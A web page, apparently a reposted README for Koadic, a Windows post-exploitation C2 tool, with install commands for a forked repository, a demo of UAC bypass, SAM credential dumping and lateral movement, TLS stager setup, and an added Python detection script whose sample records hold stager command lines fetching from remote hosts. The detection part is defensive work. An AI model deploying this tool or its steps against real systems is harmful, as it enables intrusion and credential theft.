Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and PowerShell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript), with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.

It is possible to serve payloads completely in memory from stage 0 to beyond, as well as use cryptographically secure communications over SSL and TLS (depending on what the victim OS has enabled).

Koadic also attempts to be compatible with both Python 2 and Python 3. However, as Python 2 will be going out the door in the not-too-distant future, we recommend using Python 3 for the best experience.

Install

$ git clone https://github.com/bxlcity/koadic-B.git
$ cd koadic-B
$ pip3 install -r requirements.txt
$ ./koadic

Demo info

  1. Hooks a zombie
  2. Elevates integrity (UAC Bypass)
  3. Dumps SAM/SECURITY hive for passwords
  4. Scans local network for open SMB
  5. Pivots to another machine

TLS Communications

To enable TLS communications, you will need to host your Koadic stager on a valid domain (e.g. malicious.com) with a certificate signed by a known Root CA. Windows will check its certificate store and will NOT allow a self-signed certificate.

Free certificates are available at: https://letsencrypt.org/getting-started/

(koadic: sta/js/mshta)$ set CERTPATH /path/to/fullchain.pem
(koadic: sta/js/mshta)$ set KEYPATH  /path/to/privkey.pem
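Because the stager traffic is wrapped in TLS to a domain with a trusted certificate, a defender usually has to catch the stage on the endpoint rather than on the wire. As an added example that is not part of the Koadic project, this Python script runs a simple process-creation check over constructed sample records: a Windows Script Host process (mshta.exe, wscript.exe or cscript.exe, the hosts a JScript/VBScript stager such as sta/js/mshta runs under) launched with an http(s) URL on its command line. The record format, the field layout and every sample value are assumptions made for the illustration.

```python
import re
from typing import Dict, List

# Constructed sample process-creation records (image|command line|parent image).
# They are illustrative only and do not come from the page or from a real host.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\mshta.exe|mshta.exe https://stager.example.com/stage|C:\Windows\explorer.exe",
    r"C:\Windows\System32\mshta.exe|mshta.exe C:\Tools\help.hta|C:\Tools\help.exe",
    r"C:\Windows\System32\wscript.exe|wscript.exe //E:jscript http://203.0.113.5:9999/x.js|C:\Windows\System32\cmd.exe",
    r"C:\Windows\System32\cscript.exe|cscript.exe C:\Scripts\backup.vbs|C:\Windows\System32\services.exe",
    r"C:\Windows\System32\rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL|C:\Windows\explorer.exe",
]

# Script hosts that a JScript/VBScript stager executes under.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Split one constructed record into its three fields."""
    image, cmdline, parent = line.split("|", 2)
    return {"image": image, "cmdline": cmdline, "parent": parent}


def remote_url_in(cmdline: str) -> str:
    """Return the first http(s) URL on the command line, or '' if there is none."""
    match = URL_RE.search(cmdline)
    return match.group(0) if match else ""


def is_remote_script_host(event: Dict[str, str]) -> bool:
    """True when a script host is started with a remote URL argument.

    A legitimate HTA or script is normally given a local path; a script host that
    pulls its body over HTTP(S) is the in-memory staging pattern described above.
    """
    host = event["image"].rsplit("\\", 1)[-1].lower()
    return host in SCRIPT_HOSTS and bool(remote_url_in(event["cmdline"]))


def flag_events(lines: List[str]) -> List[Dict[str, str]]:
    """Return the parsed events that match, with the fetched URL attached."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if is_remote_script_host(event):
            event["url"] = remote_url_in(event["cmdline"])
            hits.append(event)
    return hits


if __name__ == "__main__":
    for hit in flag_events(SAMPLE_EVENTS):
        print(f"ALERT {hit['image']} <- {hit['parent']} fetched {hit['url']}")
```

On real telemetry the same check should be fed from Sysmon event ID 1 or the Windows 4688 event with command-line auditing enabled, and tuned against any local HTAs that genuinely load remote content.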

Disclaimer

Code samples are provided for educational purposes. Adequate defenses can only be built by researching attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages from misuse of this information or code.

Creators

Contributors

  • @vvalien1
  • fbctf
  • cclaus
  • Arno0x
  • delirious-lettuce
  • 6IX7ine
  • psmitty7373

Acknowledgements

Special thanks to research done by the following individuals:

2023 © 0x1 | Cyber Security Consulting - Copyright All Rights Reserved